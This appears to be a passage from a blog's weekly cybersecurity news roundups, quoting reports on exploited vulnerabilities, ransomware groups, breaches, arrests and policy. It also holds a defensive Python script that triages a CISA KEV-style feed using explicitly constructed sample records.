    • CVE-2025-4664 Google Chromium Loader Insufficient Policy Enforcement Vulnerability
      • This KEV is discussed here.
    • CVE-2025-42999 SAP NetWeaver Deserialization Vulnerability
      • This KEV is discussed here.
  • Cyberscoop adds,
    • “Apple rolled out a series of substantial security updates Monday for its major software platforms, with advisories covering iOS, iPadOS, and two versions of macOS lines, addressing more than 30 vulnerabilities in total. 
    • “Among the numerous fixes, iOS 18.5 and iPadOS 18.5 introduce the first security update for Apple’s in-house C1 modem, featured in the newly released iPhone 16e. The patch addresses a baseband vulnerability (CVE-2025-31214) that, according to the company, could have allowed an attacker “in a privileged network position” to intercept network traffic. While the specific details remain undisclosed, the risk highlights concerns about how devices communicate on the hardware level, since baseband processors control things like data transmission, call processing, and other network functions.”
  • PC World reports,
    • “Malware is a thing you just have to be aware of. But it’s pretty rare that it can actually damage your computer in a permanent sense — wipe the drive if you’re okay with losing local data, and you can generally get up and running in a day or two. But what if the microcode running on your CPU’s tiny integrated memory becomes infected? One security researcher says he’s done it.
    • “Christiaan Beek of Rapid7 says he has created a proof-of-concept ransomware that can hide inside a CPU’s microcode, building on previous work that emerged when Google required AMD processors to always return “4” when asked for a random number. He claims that modifying UEFI firmware can install an unsigned update to the processor, slipping past any kind of conventional antivirus or OS-based security.” * * *
    • “CPU-level ransomware has not been seen “in the wild,” and it seems likely that when and if it emerges, it’ll be a state-level actor that exploits it first. That means your typical user probably won’t be targeted, at least immediately. Still, maybe keep a remote backup of your important files, just in case.”

From the ransomware front,

  • Per a news release,
    • “Black Kite, the leader in third-party cyber risk intelligence, today announced its newest report, 2025 Ransomware Report: How Ransomware Wars Threaten Third-Party Cyber Ecosystems, which provides a deep analysis into evolving ransomware trends and threats. The report found that threats have escalated with more actors, less predictability, and deeper entanglement in supply chains, underscoring an urgent need for organizations to implement intelligence-driven defenses and proactive vendor monitoring.”
  • Beckers Hospital Review tells us,
    • “From October 2009 to October 2024, ransomware and hacking have increasingly driven healthcare data breaches, a May 14 study published in JAMA Network Open found. 
    • “The study examined ransomware attacks and other hacking incidents across all healthcare organizations covered by HIPAA from October 2009 through October 2024. It analyzed breaches affecting 500 or more patient records that were reported to the U.S. Department of Health and Human Services (HHS) Office for Civil Rights.”
  • Cybersecurity Dive reports,
    • “A cybercrime gang believed to be responsible for three attacks in the U.K. in recent weeks has turned its attention toward the U.S. and has been able to compromise multiple targets in the sector, according to researchers from Google Threat Intelligence Group and Google subsidiary Mandiant. 
    • “Researchers said the same threat actors linked to attacks against U.K. companies are now using well-crafted social engineering techniques against U.S. retail companies.  
    • “The threat group, tracked as UNC3944 or Scattered Spider, is widely considered the prime suspect in the attacks on British firms Harrods, Co-op and M&S, but Mandiant and Google have not formally attributed the intrusions to any specific actor. Researchers said, however, that the hackers behind the U.S. attacks share the same techniques and procedures as the intruders in the British incidents.”
  • Dark Reading adds,
    • “While dynamic DNS services have been around for many years, they’ve recently emerged as an integral tool in the arsenals of cybercriminal groups like Scattered Spider.
    • “Dynamic DNS (DDNS) services automatically update a domain name’s DNS records in real-time when the Internet service provider changes the IP address. Real-time updating for DNS records wasn’t needed in the early days of the Internet when static IP addresses were the norm.” * * *
    • “In a blog post last month, threat intelligence vendor Silent Push reported that despite some notable arrests of alleged members in 2024, Scattered Spider was actively engaged in new phishing campaigns targeting well-known enterprises. One of the key findings of the report was a shift in tactics from Scattered Spider members that featured the use of rentable subdomains from dynamic DNS providers like it.com Domains LLC.
    • “In an example of an observed attack, Scattered Spider actors established a new subdomain, klv1.it[.]com, designed to impersonate a similar domain, klv1.io, for Klaviyo, a Boston-based marketing automation company.
    • “Silent Push’s report noted that the malicious domain had just five detections on VirusTotal at the time of publication. The company also said the use of publicly rentable subdomains presents challenges for security researchers.”
  • Bleeping Computer points out,
    • “Ransomware gang members increasingly use a new malware called Skitnet (“Bossnet”) to perform stealthy post-exploitation activities on breached networks.
    • “The malware has been offered for sale on underground forums like RAMP since April 2024, but according to Prodaft researchers, it started gaining significant traction among ransomware gangs since early 2025.
    • “Prodaft told BleepingComputer they have observed multiple ransomware operations deploying Skitnet in real-world attacks, including BlackBasta in Microsoft Teams phishing attacks against the enterprise, and Cactus.”

From the cybersecurity business and defenses front,

  • Cyberscoop reports,
    • “Proofpoint has entered into an agreement to acquire Hornetsecurity Group, a Germany-based provider of Microsoft 365 security services, in a deal reportedly valued at more than $1 billion.
    • “The acquisition, described as the largest in Proofpoint’s history, comes amid accelerating consolidation in the cybersecurity industry as companies seek to broaden their offerings to enterprise customers of all sizes. While Proofpoint did not disclose terms, CNBC reports the deal is “well over” $1 billion. 
    • “Hornetsecurity, headquartered in Hannover, Germany, serves more than 12,000 managed service providers (MSPs) and 125,000 small and mid-sized businesses (SMBs) primarily across Europe. According to a press release announcing the deal, Hornetsecurity brings in $160 million in annual recurring revenue, with growth exceeding 20% year over year. 
    • “For Proofpoint, the acquisition provides an entry point into the SMB market through Hornetsecurity’s established MSP network.” * * *
    • “The transaction comes as Proofpoint, which was taken private by Thoma Bravo in 2021 for $12.3 billion, is exploring an IPO, according to the CNBC report.”
  • and
    • “Coinbase responded to a security incident with combative measures Thursday after the company said cybercriminals bribed some of the cryptocurrency exchange’s international support staff to steal data on customers. The unnamed threat group stole personally identifiable information and other sensitive data on less than 1% of Coinbase’s monthly users, the company said in a blog post.
    • “The cybercriminals contacted customers under the guise of an employee at Coinbase in an attempt to dupe people into relinquishing their cryptocurrency. “They then tried to extort Coinbase for $20 million to cover this up. We said no,” the company said.
    • Coinbase flipped the script as part of its response. “Instead of paying this $20 million ransom, we’re turning it around and we’re putting out a $20 million award for any information leading to the arrest and conviction of these attackers,” Coinbase CEO Brian Armstrong said in a video posted on X.
    • “For these would-be extortionists, or anyone seeking to harm Coinbase customers, know that we will prosecute you and bring you to justice,” he added.” 
  • Dark Reading shares insights on the recent RSAC conference and of course also offers its CISO Corner.

Cybersecurity Saturday

From the cybersecurity policy and law enforcement front,

  • Per a Senate news release,
    • “U.S. Senators Mike Rounds (R-S.D.), Chairman of the Senate Armed Services Committee’s Subcommittee on Cybersecurity, and Gary Peters (D-Mich.) introduced a bipartisan bill to extend the Cybersecurity Information Sharing Act (CISA) of 2015 for an additional ten years.
    • CISA, signed into law in 2015, incentivizes companies to voluntarily share cybersecurity threat indicators, such as software vulnerabilities, malware or malicious IP addresses, with the Department of Homeland Security (DHS). This protects Americans’ personal information and makes certain that both the federal government and companies can take collaborative steps to prevent data breaches or attacks from cybercriminals and foreign adversaries.
    • “The Cybersecurity Information Sharing Act of 2015 has been instrumental in strengthening our nation’s cyber defenses by enabling critical information sharing between the private sector and government,” said Rounds. “Allowing this legislation to lapse would significantly weaken our cybersecurity ecosystem, removing vital liability protections and hampering defensive operations across both the defense industrial base and critical infrastructure sectors.”
    • “As cybersecurity threats grow increasingly sophisticated, information sharing is not just valuable—it remains essential for our national security,” said Peters. “For the past ten years, these critical protections have helped to address rapidly evolving cybersecurity threats, and this bipartisan bill will renew them so we can continue this collaborative partnership between the private sector and government to bolster our nation’s cybersecurity defenses against a wide range of adversaries.”
    • Click HERE to read full text of the bill.
  • Cyberscoop reports,
    • “A bipartisan Senate bill would formally ban the use of DeepSeek by federal contractors, part of a larger effort to keep the Chinese-made large language model out of government systems and networks, where lawmakers fear it could pose cybersecurity and national security concerns.
    • “The bill, introduced by Sens. Bill Cassidy, R-La., and Jacky Rosen, D-Nev., would bar federal contractors from using the model to carry out any activity related to a federal contract. It also blocks contractors from using any successor model developed by High Flyer, the Chinese quantitative firm that made DeepSeek.
    • “Cassidy and Rosen cited the potential that the use of DeepSeek — which acknowledges that it sends user data back to China — to carry out contract work may put sensitive federal data in the hands of the Chinese government.
    • “AI is a powerful tool which can be used to enhance things like medicine and education,” Cassidy said in a statement. “But in the wrong hands, it can be weaponized. By feeding sensitive data into systems like DeepSeek, we give China another weapon.” 
  • and
    • “Authorities in Poland have arrested four people accused of administrating and selling access to distributed denial of service (DDoS) services, according to a press release from Europol.  
    • “The suspects are believed to have operated six so-called “stresser” or “booter” services that enabled customers across the world to launch thousands of attacks on targets ranging from government offices to businesses and schools. From 2022 to 2025, the platforms — identified as Cfxapi, Cfxsecurity, neostress, jetstress, quickdown, and zapcut — allegedly allowed users to bombard websites and servers with high volumes of junk traffic, often rendering them inaccessible. 
    • “The services, which offered easy-to-navigate interfaces, required minimal user knowledge: attackers could select a target, choose the attack specifications, and pay as little as 10 euros for each disruption, according to Europol.
    • “The arrests in Poland were part of a coordinated law enforcement response spanning four countries and supported by Europol. In addition to the Central Cybercrime Bureau in Poland, the investigation was supported by German Federal Criminal Police Office, the Prosecutor General’s Office in Frankfurt, the Dutch National Police, and multiple U.S. agencies, including the Department of Justice, FBI, Homeland Security Investigations (HSI), and Defense Criminal Investigative Service (DCIS).” 

From the cybersecurity breaches and vulnerabilities front,

  • Bleeping Computer tells us,
    • “Ascension, one of the largest private healthcare systems in the United States, has revealed that the personal and healthcare information of over 430,000 patients was exposed in a data breach disclosed last month.
    • “As Ascension revealed in breach notification letters sent to affected individuals in April, their information was stolen in a data theft attack that impacted a former business partner in December.
    • “Depending on the impacted patient, the attackers could access personal health information related to inpatient visits, including the physician’s name, admission and discharge dates, diagnosis and billing codes, medical record number, and insurance company name. They could also gain access to personal information, including name, address, phone number(s), email address, date of birth, race, gender, and Social Security numbers (SSNs).” * * *
    • “Our investigation determined on January 21, 2025, that Ascension inadvertently disclosed information to a former business partner, and some of this information was likely stolen from them due to a vulnerability in third-party software used by the former business partner.” * * *
    • “Although Ascension didn’t share any details regarding the breach affecting its former business partner, the timeline of the breach implies that the attack was part of widespread Clop ransomware data theft attacks that exploited a zero-day flaw in Cleo secure file transfer software.
    • “Last year, Ascension notified almost 5.6 million patients and employees that their personal, financial, insurance, and health information had been stolen in a May 2024 Black Basta ransomware attack.”
  • and
    • “Cisco has fixed a maximum severity flaw in IOS XE Software for Wireless LAN Controllers caused by a hard-coded JSON Web Token (JWT) that allows an unauthenticated remote attacker to take over devices.
    • “This token is meant to authenticate requests to a feature called ‘Out-of-Band AP Image Download.’ Since it’s hard-coded, anyone can impersonate an authorized user without credentials.
    • “The vulnerability is tracked as CVE-2025-20188 and has a maximum 10.0 CVSS score, allowing threat actors to fully compromise devices according to the vendor.”
  • Cybersecurity Dive informs us,
    • “A second wave of cyberattacks is targeting a critical vulnerability in SAP NetWeaver Visual Composer, according to researchers.
    • “Following the initial round of threat activity disclosed in April, opportunistic threat actors are leveraging webshells that were previously established through exploitation of CVE-2025-31324. The vulnerability, with a CVSS score of 10, allows unauthenticated attackers to upload arbitrary files and take full control of a system, according to researchers at Onapsis.
    • “Onapsis and Mandiant are tracking hundreds of confirmed compromises worldwide, with the cases spanning across multiple industries, including utilities, manufacturing, oil and gas and other critical infrastructure sectors. 
    • “The Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its known exploited vulnerabilities catalog in late April.” 
  • Cyberscoop adds,
    • “Vulnerabilities are proliferating in SonicWall devices and software this year, putting the vendor’s customers at risk of intrusion via secure access gateways and firewalls.
    • “The year started off on a sour note for the California-based company when it released security advisories for nine vulnerabilities on Jan. 7. The total number of vulnerabilities publicly disclosed by the company so far in 2025 has grown to 20. 
    • “SonicWall vulnerabilities are also making a consistent appearance on the Cybersecurity and Infrastructure Security Agency’s known exploited vulnerabilities (KEV) catalog. Cyber authorities confirm that attackers exploited four vulnerabilities in SonicWall products so far this year, and 14 total since late 2021.
    • “Eight of those vulnerabilities have been exploited in ransomware campaigns, according to CISA.”
  • Bleeping Computer adds,
    • “SonicWall has urged its customers to patch three security vulnerabilities affecting its Secure Mobile Access (SMA) appliances, one of them tagged as exploited in attacks.
    • “Discovered and reported by Rapid7 cybersecurity researcher Ryan Emmons, the three security flaws (CVE-2025-32819, CVE-2025-32820, and CVE-2025-32821) can be chained by attackers to gain remote code execution as root and compromise vulnerable instances.
    • “The vulnerabilities impact SMA 200, SMA 210, SMA 400, SMA 410, and SMA 500v devices and are patched in firmware version 10.2.1.15-81sv and higher.”
  • CISA added four known exploited vulnerabilities to its catalog this week.
  • May 5, 2025
    • CVE-2025-3248 Langflow Missing Authentication Vulnerability
    • Dark Reading discusses this KEV here.
  • May 6, 2025
    • CVE-2025-27363 FreeType Out-of-Bounds Write Vulnerability
    • Hacker News discusses this KEV here.
  • May 7, 2025
    • CVE-2024-6047 GeoVision Devices OS Command Injection Vulnerability
    • CVE-2024-11120 GeoVision Devices OS Command Injection Vulnerability
    • SC Media discusses these KEVs here.

From the ransomware front,

  • Dark Reading reports,
    • “Email-based attacks continued to cost enterprises big bucks in 2024, according to new cyber-insurance claims data.
    • “Cyber-insurance carrier Coalition published its “2025 Cyber Claims Report” on May 7, showing that business email compromise (BEC) attacks and fund transfer fraud (FTF) accounted for 60% of all the company’s claims last year. BEC attacks were particularly problematic for customers, according to Coalition; claims severity for such threats increased 23%, with incidents costing organizations, on average, $35,000.
    • “That dollar figure is a far cry from the average loss for ransomware attacks in 2024, which Coalition said was $292,000. However, the claims report, which features data from customers in the US, the UK, Canada, and Australia, offered some encouraging data points, including a 7% drop in ransomware claims severity and a 3% decline in claims frequency.
    • “Additionally, Coalition found that FTF claims severity fell dramatically by 46%, to an average loss of $185,000, while claims frequency dropped 2%. Overall, the cyber-insurance carrier said it observed “remarkable year-over-year (YoY) stability” for claims, despite an intensifying threat landscape where financially motivated attackers continue to develop novel techniques and exploit new vulnerabilities.”
  • The Hacker News relates,
    • “Threat actors with ties to the Qilin ransomware family have leveraged malware known as SmokeLoader along with a previously undocumented .NET compiled loader codenamed NETXLOADER as part of a campaign observed in November 2024.
    • “NETXLOADER is a new .NET-based loader that plays a critical role in cyber attacks,” Trend Micro researchers Jacob Santos, Raymart Yambot, John Rainier Navato, Sarah Pearl Camiling, and Neljorn Nathaniel Aguas said in a Wednesday analysis.
    • “While hidden, it stealthily deploys additional malicious payloads, such as Agenda ransomware and SmokeLoader. Protected by .NET Reactor 6, NETXLOADER is difficult to analyze.”
    • “Qilin, also called Agenda, has been an active ransomware threat since it surfaced in the threat landscape in July 2022. Last year, cybersecurity company Halcyon discovered an improved version of the ransomware that it named Qilin.B.”
  • Per Bleeping Computer,
    • “The Play ransomware gang has exploited a high-severity Windows Common Log File System flaw in zero-day attacks to gain SYSTEM privileges and deploy malware on compromised systems.
    • “The vulnerability, tracked as CVE-2025-29824, was tagged by Microsoft as exploited in a limited number of attacks and patched during last month’s Patch Tuesday.
    • “The targets include organizations in the information technology (IT) and real estate sectors of the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia,” Microsoft said in April.”
  • The Wall Street Journal reports,
    • “The hacking group that once shut down half the Las Vegas Strip has returned and is causing turmoil at U.K. retailers.
    • “The hackers call themselves Star Fraud but are more widely known as Scattered Spider, a collective of largely young men and teenagers that have wreaked havoc across industries in recent years.
    • “U.K. retailers Harrods, Marks & Spencer and Co-op have all reported cyber intrusions in the past two weeks. Scattered Spider hasn’t been publicly named as the culprit of the hacks, but is suspected in at least some of them, according to people familiar with the investigation.
    • “The attacks bear all the hallmarks of Scattered Spider attacks, disrupting online sales and certain payments and leading to the theft of customer data. The stores have remained open.
    • “The group’s hackers “typically work their way through a sector, so other retailers should take the opportunity to harden their defenses,” said John Hultquist, chief analyst with Google’s Mandiant cybersecurity investigations group.” 
  • Per Cyberscoop,
    • “Five months after education software vendor PowerSchool paid an unnamed threat actor a ransom in exchange for the deletion of sensitive stolen data, some of the company’s customers are now receiving extortion demands. 
    • “A threat actor, who may or not be the same criminal group behind the attack, has contacted four school district customers of PowerSchool in the past few days, CyberScoop has learned, threatening to leak data if they don’t pay. 
    • “The downstream extortion attacks highlight the ongoing risk organizations confront when a vendor is hit by a cyberattack, exposing not just their data but also that of others in their supply chain. The follow-on extortion attempts also underscore that paying ransoms for data does not guarantee stolen data won’t be leaked.”
  • Dark Reading reports,
    • “The notorious ransomware gang LockBit appeared to suffer another setback this week after its network was compromised by an unknown adversary.
    • “On May 7, a range of security researchers observed that LockBit’s Dark Web leak site had been altered. Instead of listing victim organizations, the site now features a simple message: “Don’t do crime CRIME IS BAD xoxo from Prague,” along with a link to a zip archive.
    • “The archive, according to analysis from Qualys yesterday, among others, includes a SQL database file from LockBit’s affiliate panel. Coalition researchers, meanwhile, noted the file includes extensive internal data from the ransomware-as-a-service operation, including nearly 60,000 Bitcoin addresses and more than 4,000 chats with victim organizations from between Dec. 19, 2024, and April 29, 2025.
    • “The file also contains information on more than 70 LockBit administrators and affiliates, researchers noted, including plaintext passwords, as well as individual builds and configurations of the LockBit ransomware code. However, the leaked data did not include decryptors or private keys.”

From the cybersecurity defenses front,

  • CISA announced,
    • “The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Environmental Protection Agency (EPA), and Department of Energy (DOE)—hereafter referred to as “the authoring organizations”—are aware of cyber incidents affecting the operational technology (OT) and industrial control systems (ICS) of critical infrastructure entities in the United States. The authoring organizations urge critical infrastructure entities to review and act now to improve their cybersecurity posture against cyber threat activities specifically and intentionally targeting internet connected OT and ICS.”
    • Mitigations and resources are included in the announcement.
  • Bank Info Security lets us know that “Despite the rise of artificial intelligence and automation, human ingenuity remains a critical asset in defending against cyberthreats, said Kara Sprague, CEO at HackerOne.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the cybersecurity and law enforcement front,

  • Cyberscoop reports,
    • “Homeland Security Secretary Kristi Noem outlined her plans Tuesday to refocus the Cybersecurity and Infrastructure Security Agency (CISA) on protecting critical infrastructure from increasingly sophisticated threats — particularly from China — while distancing the agency from what she characterized as mission drift under previous leadership.
    • “Speaking at the 2025 RSAC Conference, Noem provided the most detailed vision yet of how the current administration is pushing CISA to a “back-to-basics” approach aimed at hardening defenses against adversaries who have demonstrated capabilities to infiltrate critical systems.”
  • and
    • “Threat intelligence sharing is flowing between the private sector and federal government and remains unimpeded thus far by job losses and budget cuts across federal agencies that support the cyber mission, according to executives at major security firms.
    • “Top brass at Amazon, CrowdStrike, Google and Palo Alto Networks said there’s been no change to interactions with the federal government since President Donald Trump was inaugurated earlier this year.
    • “Across multiple interviews and media briefings during the RSAC 2025 Conference this week, none of the leaders at these top cybersecurity companies conveyed any concern about or experience with communication breakdowns. Each of them dismissed the idea that collaboration has slowed down amid significant workforce reductions and strategic changes across the federal government.”
  • Earlier this week, the National Institute of Standards and Technology released its FY 2024 Cybersecurity & Privacy Program Annual Report.
  • Federal News Network tells us,
    • “While much of the cybersecurity community’s attention was out west at the annual RSA Conference, the Justice Department announced yet another settlement in its pursuit of contractors who falsely attest to meeting cybersecurity requirements.
    • “DoJ announced today that Raytheon Company, RTX Corporation and Nightwing Group have agreed to pay $8.3 million to settle allegations that Raytheon violated the False Claims Act by falling short of contractually mandated cybersecurity standards.
    • “RTX sold its cybersecurity, intelligence and services business to Nightwing in 2024. DoJ’s case centered on conduct between 2015 and 2021, prior to the acquisition.
    • “The case is another feather in the cap for DoJ’s Civil-Cyber Fraud Initiative. Started under the Biden administration, the goal of the initiative is to enforce cybersecurity requirements that many contractors had been ignoring through the False Claims Act.”
  • Per the Hacker News,
    • “The U.S. Department of Justice (DoJ) on Thursday announced charges against a 36-year-old Yemeni national for allegedly deploying the Black Kingdom ransomware against global targets, including businesses, schools, and hospitals in the United States.
    • “Rami Khaled Ahmed of Sana’a, Yemen, has been charged with one count of conspiracy, one count of intentional damage to a protected computer, and one count of threatening damage to a protected computer. Ahmed is assessed to be currently living in Yemen.
    • “From March 2021 to June 2023, Ahmed and others infected computer networks of several U.S.-based victims, including a medical billing services company in Encino, a ski resort in Oregon, a school district in Pennsylvania, and a health clinic in Wisconsin,” the DoJ said in a statement.”
  • Cyberscoop adds,
    • “Federal authorities extradited a Ukrainian citizen to the United States on Wednesday to face charges for participating in a series of ransomware cyberattacks on organizations based in the U.S. and multiple European countries. 
    • “Artem Stryzhak, 35, was arrested in Spain in June 2024 and was scheduled to appear for arraignment Thursday in the U.S. District Court for the Eastern District of New York. Stryzhak is accused of conspiracy to commit fraud and related activity, including extortion.
    • “Prosecutors accuse Stryzhak and his co-conspirators of using Nefilim ransomware to encrypt computer networks in the U.S., Canada, France, Germany, Australia, the Netherlands, Norway and Switzerland between late 2018 to late 2021.
    • “As alleged, the defendant was part of an international ransomware scheme in which he conspired to target high-revenue companies in the United States, steal data, and hold data hostage in exchange for payment. If victims did not pay, the criminals then leaked the data online,” John Durham, U.S. attorney for the Eastern District of New York, said in a statement.”

From the cybersecurity vulnerabilities and breaches front,

  • Cybersecurity Dive reports,
    • “Hackers are increasingly using AI in their attacks and defenders should follow suit, Check Point Software Technologies said in a report published Wednesday.
    • “The company’s AI security report, announced at the 2025 RSAC Conference in San Francisco, also found that one in 13 generative AI prompts contained potentially sensitive information, and one in every 80 prompts posed “a high risk of sensitive data leakage.”
    • “Unauthorized AI tools, data loss, and AI platform vulnerabilities topped the list of AI risks for enterprises, according to Check Point.”
  • and
    • “In a report published Tuesday, Google said it saw hackers exploit fewer zero-day vulnerabilities in the wild in 2024 than in 2023.
    • “The company attributed the decrease to improvements in secure software development practices.
    • “Still, Google said it is seeing a “slow but steady” increase in the rate of zero-day exploitation over time.”
  • CISA added eight known exploited vulnerabilities to its catalog this week.
  • April 28, 2025
    • CVE-2025-1976 Broadcom Brocade Fabric OS Code Injection Vulnerability
    • CVE-2025-42599 Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability
    • CVE-2025-3928 Commvault Web Server Unspecified Vulnerability
    • Bleeping Computer discusses these KEVs here.
  • April 29, 2025
    • CVE-2025-31324 SAP NetWeaver Unrestricted File Upload Vulnerability
    • Cybersecurity Dive discusses this KEV here.
  • May 1, 2025
    • CVE-2024-38475 Apache HTTP Server Improper Escaping of Output Vulnerability
    • CVE-2023-44221 SonicWall SMA100 Appliances OS Command Injection Vulnerability
    • Cybersecurity News discusses the Apache KEV here.
    • Bleeping Computer discusses the SonicWall KEV here.
  • May 2, 2025
    • CVE-2025-34028 Commvault Command Center Path Traversal Vulnerability
    • CVE-2024-58136 Yiiframework Yii Improper Protection of Alternate Path Vulnerability
    • Security Affairs discusses these KEVs here.
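The weekly KEV additions listed above, and the May 5 to 7 list earlier on this page, are the kind of feed a defender should be pulling automatically rather than reading by hand, and the ransomware-campaign count quoted from CISA earlier is the field that should drive the ordering. The following is an added example, not CISA's code or anything from the cited articles: it parses a feed in the shape of CISA's published KEV JSON (field names such as cveID, dateAdded, dueDate and knownRansomwareCampaignUse are taken from that feed), reports what was added in a given week, and orders the backlog by ransomware linkage and remediation deadline. The sample records below are constructed for illustration; their due dates, added dates and vulnerability names are assumptions, not copies of the catalog entries.

```python
"""Triage a CISA KEV catalog feed: what was added this week, what is
ransomware-linked, and what is closest to (or past) its due date.
Added example; the records below are a constructed sample in the shape of
the published KEV JSON feed, not the catalog itself."""
import json
from datetime import date

# Constructed sample. Field names follow the KEV JSON feed; the dates,
# names and ransomware flags here are assumed for illustration only.
SAMPLE_KEV_JSON = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "catalogVersion": "2025.05.07",
    "dateReleased": "2025-05-07T00:00:00.0000Z",
    "count": 5,
    "vulnerabilities": [
        {"cveID": "CVE-2025-29824", "vendorProject": "Microsoft", "product": "Windows",
         "vulnerabilityName": "Windows Common Log File System Driver Vulnerability",
         "dateAdded": "2025-04-08", "dueDate": "2025-04-29",
         "knownRansomwareCampaignUse": "Known", "requiredAction": "Apply vendor updates."},
        {"cveID": "CVE-2025-3248", "vendorProject": "Langflow", "product": "Langflow",
         "vulnerabilityName": "Langflow Missing Authentication Vulnerability",
         "dateAdded": "2025-05-05", "dueDate": "2025-05-26",
         "knownRansomwareCampaignUse": "Unknown", "requiredAction": "Apply vendor updates."},
        {"cveID": "CVE-2025-27363", "vendorProject": "FreeType", "product": "FreeType",
         "vulnerabilityName": "FreeType Out-of-Bounds Write Vulnerability",
         "dateAdded": "2025-05-06", "dueDate": "2025-05-27",
         "knownRansomwareCampaignUse": "Unknown", "requiredAction": "Apply vendor updates."},
        {"cveID": "CVE-2024-6047", "vendorProject": "GeoVision", "product": "Devices",
         "vulnerabilityName": "GeoVision Devices OS Command Injection Vulnerability",
         "dateAdded": "2025-05-07", "dueDate": "2025-05-28",
         "knownRansomwareCampaignUse": "Unknown", "requiredAction": "Apply vendor updates."},
        {"cveID": "CVE-2024-11120", "vendorProject": "GeoVision", "product": "Devices",
         "vulnerabilityName": "GeoVision Devices OS Command Injection Vulnerability",
         "dateAdded": "2025-05-07", "dueDate": "2025-05-28",
         "knownRansomwareCampaignUse": "Unknown", "requiredAction": "Apply vendor updates."},
    ],
})


def load_catalog(feed_text):
    """Parse the KEV JSON feed text and return its vulnerability records."""
    return json.loads(feed_text)["vulnerabilities"]


def added_between(entries, start, end):
    """Records whose dateAdded falls within [start, end], inclusive."""
    return [e for e in entries if start <= date.fromisoformat(e["dateAdded"]) <= end]


def ransomware_linked(entries):
    """Records CISA has flagged as used in ransomware campaigns."""
    return [e for e in entries if e.get("knownRansomwareCampaignUse") == "Known"]


def triage(entries, today):
    """Backlog ordered: ransomware-linked first, then overdue, then by days left."""
    rows = []
    for e in entries:
        due = date.fromisoformat(e["dueDate"])
        rows.append({
            "cve": e["cveID"],
            "product": f'{e["vendorProject"]} {e["product"]}',
            "ransomware": e.get("knownRansomwareCampaignUse") == "Known",
            "days_left": (due - today).days,   # negative once the due date has passed
            "overdue": due < today,
        })
    rows.sort(key=lambda r: (not r["ransomware"], not r["overdue"], r["days_left"]))
    return rows


def weekly_report(feed_text, week_start, week_end, today):
    """Build the report from ISO date strings so it can be driven from a cron job."""
    entries = load_catalog(feed_text)
    start, end, now = (date.fromisoformat(d) for d in (week_start, week_end, today))
    return {
        "new_this_week": [e["cveID"] for e in added_between(entries, start, end)],
        "ransomware_linked": [e["cveID"] for e in ransomware_linked(entries)],
        "triage": triage(entries, now),
    }


if __name__ == "__main__":
    report = weekly_report(SAMPLE_KEV_JSON, "2025-05-05", "2025-05-11", "2025-05-10")
    print("Added this week:", ", ".join(report["new_this_week"]))
    print("Ransomware-linked:", ", ".join(report["ransomware_linked"]))
    for row in report["triage"]:
        flag = "RANSOMWARE " if row["ransomware"] else ""
        state = "OVERDUE" if row["overdue"] else f'{row["days_left"]}d left'
        print(f'{flag}{row["cve"]} ({row["product"]}): {state}')
```

In production the feed text comes from the catalog's JSON download rather than the inline sample; the BOD 22-01 due date applies to federal civilian agencies, but the same ordering is a reasonable default for anyone else, since a ransomware-linked entry past its due date is the item most likely to be hit next.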

From the ransomware front,

  • Techradar points out,
    • New research has revealed the scale of the recent ransomware revolution, warning it remains a dominant threat to organizations worldwide.
    • A Veeam study, which gathered insights from 1,300 CISOs, IT leaders, and security professionals across the Americas, Europe, and Australia, found nearly three-quarters of businesses were impacted by ransomware over the past year.
    • Cybersecurity measures seem to be having some effect, with businesses facing ransomware incidents dropping slightly from 75% to 69% – and ransomware payments are also decreasing, as in 2024, 36% of affected businesses chose not to pay, and 60% of those who did paid less than half of the demanded ransom.
  • Dark Reading adds,
    • “Several high-profile retailers based in the UK have suffered cyberattacks in recent weeks, and all signs point to two possible threat actors being behind the campaign.
    • “The National Cyber Security Centre (NCSC), the UK’s primary cyber agency, said on May 1 that it was tracking a series of attacks impacting retailers. NCSC CEO Dr. Richard Horne said in an included statement that the agency was working with affected organizations and that “these incidents should act as a wake-up call to all organizations.”
    • “Co-Op, Marks & Spencer, and Harrods are among the retailers that have confirmed attacks in recent weeks. In an article published May 2, Bloomberg News reported a spokesperson for the DragonForce ransomware gang — a group that emerged as a ransomware-as-a-service (RaaS) player in 2023 — took credit for the attacks against all three retailers.
    • “Last month, researchers from Sophos’ Secureworks reported that DragonForce had an RaaS model where affiliates could create their own “brand,” using DragonForce’s ransomware or using their own tools for extortion attacks.”
  • and
    • “The notorious Scattered Spider threat group continues to attack high-value targets despite landing on the receiving end of multiple global law enforcement operations.
    • “Scattered Spider gained notoriety in recent years with high-profile breaches and ransomware attacks against large enterprises, including Las Vegas casino and hotel giants Caesars Entertainment and MGM Resorts in 2023. First emerging in 2022, the group’s members displayed a knack for social engineering schemes that allowed them to steal credentials from targeted organizations and gain privileged access into their networks. * * *
    • “Bleeping Computer this week reported that the cyberattack against British retail giant Marks & Spencer was perpetrated by members of the group using DragonForce ransomware. Earlier this month, threat intelligence vendor Silent Push said it had observed significant threat activity, specifically phishing campaigns targeting well-known brands this year, from Chick-fil-A to Louis Vuitton.”
  • and
    • “RansomHub, an aggressive ransomware-as-a-service (RaaS) operation that gained prominence over the past year in the wake of law enforcement actions against LockBit and ALPHV, appears to have abruptly gone dark earlier this month.
    • “In a new report this week that offers an in-depth look at RansomHub’s affiliate recruitment methods, negotiation tactics, and aggressive extortion strategies, researchers at Group-IB described the operation as inactive since April 1.
    • “Cybercriminals associated with the operation may have migrated to the Russian-language speaking Qilin RaaS operation and are continuing their attacks under that banner, Group-IB said. The security vendor did not offer any explanation for the rapidly growing RansomHub operation’s seemingly sudden and unexpected demise — if that is indeed what it is.”
  • TechTarget offers a “look at the [seven] distinct stages of the ransomware lifecycle to better understand how attackers strike — and how defenders might be better able to resist.”

From the cybersecurity defense front,

  • Cyberscoop reports
    • “Leaders of various federal research agencies and departments outlined a vision Tuesday for the future of critical infrastructure security, emphasizing the promise of combining formal software development methods with large language models (LLMs). 
    • “Acting DARPA Director Rob McHenry told an audience at the RSAC 2025 Conference that such a combination could “virtually eliminate software vulnerabilities” across foundational system infrastructures, a departure from the traditionally accepted risks of software flaws.
    • “We’ve all been trained in a world where we have to accept that there are vulnerabilities in our software, and bad guys exploit those vulnerabilities,” he said. “We try to mitigate the damage and patch them, and we go round on this merry-go-round. That technologically does not need to be true anymore.”
